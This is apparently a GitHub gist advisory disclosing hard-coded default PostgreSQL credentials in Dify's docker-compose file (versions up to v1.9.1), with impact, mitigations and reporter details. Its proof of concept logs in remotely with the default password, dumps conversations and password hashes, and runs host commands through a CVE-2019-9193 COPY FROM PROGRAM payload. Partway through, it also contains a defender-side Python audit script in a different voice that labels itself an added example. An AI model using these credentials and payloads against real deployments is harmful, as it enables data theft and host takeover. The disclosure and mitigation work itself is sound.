@Cristliu
Last active September 30, 2025 17:56
Dify Platform PostgreSQL Default Credentials Vulnerability
Vulnerability Overview
Vendor: Dify (langgenius/dify)
Product: Dify - Open-source LLM application development platform
Affected Versions: <= v1.9.1
Vulnerability Type: CWE-798 (Use of Hard-coded Credentials)
1. Attack Type:
- Remote
- Local (for internal environments with exposed services)
---
2. Impact
- Code Execution: Due to CVE-2019-9193 (PostgreSQL vulnerability), an attacker can execute arbitrary commands, potentially gaining full control over the system where the service is hosted.
- Information Disclosure: Attackers can gain unauthorized access to sensitive data, including users' interactions with the AI system and other sensitive records stored in the database.
- Escalation of Privileges: The use of default credentials (PGUSER and POSTGRES_PASSWORD) allows attackers to gain administrative privileges in the PostgreSQL database, potentially leading to full system compromise.
---
3. Affected Component(s)
- docker/docker-compose.yaml (PostgreSQL service configuration)
- Default database configuration in deployment setup
- PostgreSQL service (db container)
Specific code location:
```yaml
# docker/docker-compose.yaml - PostgreSQL database section
services:
  db:
    environment:
      PGUSER: ${PGUSER:-postgres}
      POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-difyai123456}
```
---
4. Attack Vector(s)
- Internal Network: An attacker with access to the internal network can connect to the exposed PostgreSQL database using the default username (postgres) and password (difyai123456) to access sensitive data stored in the database.
- External Network: An attacker can use network reconnaissance tools such as FOFA to discover Dify instances with exposed PostgreSQL service ports (5432) and attempt to connect using default credentials. Once connected, the attacker can retrieve all stored data, including user interactions and configuration details.
- Privilege Escalation via PostgreSQL CVE-2019-9193: If the PostgreSQL service is vulnerable to CVE-2019-9193, an attacker may be able to escalate privileges by executing arbitrary commands on the host system via the database connection.
---
5. Suggested Description for CVE:
The Dify platform, a widely used service for deploying large language models (LLMs), has a critical vulnerability related to the PostgreSQL database configuration.
A hard-coded default credential vulnerability exists in Dify's PostgreSQL database configuration.
The docker-compose.yaml file specifies default credentials (username: postgres, password: difyai123456) that remain unchanged in many production deployments.
When administrators expose the PostgreSQL service port (5432) for team collaboration purposes, these default credentials become exploitable by unauthorized parties who can access the network.
Since Dify is open-source, the default credentials are publicly known. Attackers can:
(1) Information Disclosure: Access all database contents including user conversations, API keys, workspace data, and administrative credentials
(2) Privilege Escalation: Gain administrative access to the Dify platform by extracting admin credentials
(3) Code Execution (Chained): Leverage PostgreSQL vulnerabilities (e.g., CVE-2019-9193) to execute arbitrary commands on the host system with database privileges
This vulnerability affects both internal network scenarios (privilege escalation by low-privileged users) and external attack scenarios (remote unauthorized access).
---
6. Proof of Concept (PoC)
Environment Setup:
(1) Deploy Dify v1.9.1 using the official docker-compose
(2) Add port mapping to expose PostgreSQL:
```yaml
# Modified docker-compose.yaml
db:
  image: postgres:15-alpine
  ports:
    - "5432:5432"   # Added this line
  environment:
    PGUSER: ${PGUSER:-postgres}
    POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-difyai123456}
```
Exploitation Steps:
Test 1: Remote Connection
```bash
# From attacker machine
$ psql -h 192.**.**.100 -p 5432 -U postgres -d dify
Password for user postgres: difyai123456
psql (15.x)
Type "help" for help.

dify=# \dt
              List of relations
 Schema |       Name        | Type  |  Owner
--------+-------------------+-------+----------
 public | accounts          | table | postgres
 public | messages          | table | postgres
 public | api_keys          | table | postgres
...

dify=# SELECT email, password FROM accounts WHERE role = 'admin';
```
Test 2: Data Exfiltration
```sql
-- Extract all AI conversation history
COPY (SELECT * FROM messages) TO STDOUT CSV HEADER;
-- Extract sensitive credentials
SELECT id, email, password_hash FROM accounts;
```
Test 3: Privilege Escalation via CVE-2019-9193
```sql
-- Create malicious table and execute commands
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
```
---
7. Affected Versions
Versions <= v1.9.1 are confirmed vulnerable when deployed with the default configuration.
---
8. Recommended Mitigation
- Immediate: Force a password change on first deployment
- Remove hard-coded defaults from docker-compose.yaml
- Add a security warning in the documentation about exposing the PostgreSQL port
- Implement: Automatic generation of random credentials during installation
- Network security: Do not expose the PostgreSQL port to untrusted networks
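A defender-side audit of the two conditions this advisory chains (the fallback password resolving to the public default, and port 5432 published to the host), together with a hardened compose variant that replaces the fallback with a mandatory `${VAR:?err}` variable. This is an added example, not code from the gist or the Dify project; it assumes Compose's documented `${VAR:-default}` / `${VAR:?err}` interpolation rules and uses a line-based scan instead of a YAML parser.

```python
import re

# Constant from the advisory: the fallback password shipped in docker/docker-compose.yaml (Dify <= v1.9.1)
DEFAULT_PG_PASSWORD = "difyai123456"

# Compose interpolation forms: ${VAR}, ${VAR:-default}, ${VAR-default}, ${VAR:?err}, ${VAR?err}
_SUBST = re.compile(r"\$\{(?P<name>[A-Za-z_]\w*)(?:(?P<op>:-|-|:\?|\?)(?P<arg>[^}]*))?\}")

def interpolate(value, env):
    """Resolve Compose-style substitutions against env (a dict standing in for the shell environment
    or .env). Raises KeyError for a mandatory ${VAR:?err} that is unset/empty, as Compose refuses to start."""
    def repl(m):
        name, op, arg = m.group("name"), m.group("op"), m.group("arg")
        present, nonempty = name in env, bool(env.get(name))
        if op in (":-", "-"):  # default-value forms; ":-" also treats an empty value as unset
            return env[name] if (nonempty if op == ":-" else present) else arg
        if op in (":?", "?"):  # mandatory forms
            if not (nonempty if op == ":?" else present):
                raise KeyError(f"{name} is required: {arg}")
            return env[name]
        return env.get(name, "")
    return _SUBST.sub(repl, value)

def audit_db_service(compose_text, env):
    """Check the two conditions the advisory chains: effective POSTGRES_PASSWORD equals the public
    default, and 5432 is published to the host. Line-based heuristic sufficient for Dify's layout."""
    result = {"password_is_default": False, "password_required": False, "port_published": False}
    m = re.search(r"^\s*POSTGRES_PASSWORD:\s*(.+?)\s*$", compose_text, re.M)
    if m:
        try:
            result["password_is_default"] = interpolate(m.group(1).strip("\"'"), env) == DEFAULT_PG_PASSWORD
        except KeyError:
            result["password_required"] = True  # hardened: no fallback, deployment fails without a value
    # Any "[bind-addr:]hostport:5432" entry publishes the db beyond the compose-internal network
    result["port_published"] = bool(re.search(r'^\s*-\s*"?(?:[\w.]+:)?\d+:5432"?', compose_text, re.M))
    return result

# Constructed samples: the advisory's vulnerable fragment, and a hardened variant without the
# published port and with the fallback replaced by a mandatory variable
WEAK_COMPOSE = """services:
  db:
    image: postgres:15-alpine
    ports:
      - "5432:5432"
    environment:
      PGUSER: ${PGUSER:-postgres}
      POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-difyai123456}
"""
HARDENED_COMPOSE = WEAK_COMPOSE.replace('    ports:\n      - "5432:5432"\n', "").replace(
    ":-difyai123456}", ":?POSTGRES_PASSWORD must be set in .env}")
```

Run `audit_db_service(WEAK_COMPOSE, {})` against a deployment with no `.env` override to see both findings raised, and against `HARDENED_COMPOSE` to see the mandatory variable reported instead of a default password.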
---
9. Reporter
National University of Defense Technology: Zhihuang Liu, Ling Hu, Yonghao Tang, Tongqing Zhou, Zhiping Cai & Hunan University: Fang Liu
Contact: herecristliu@gmail.com, lzhliu@nudt.edu.cn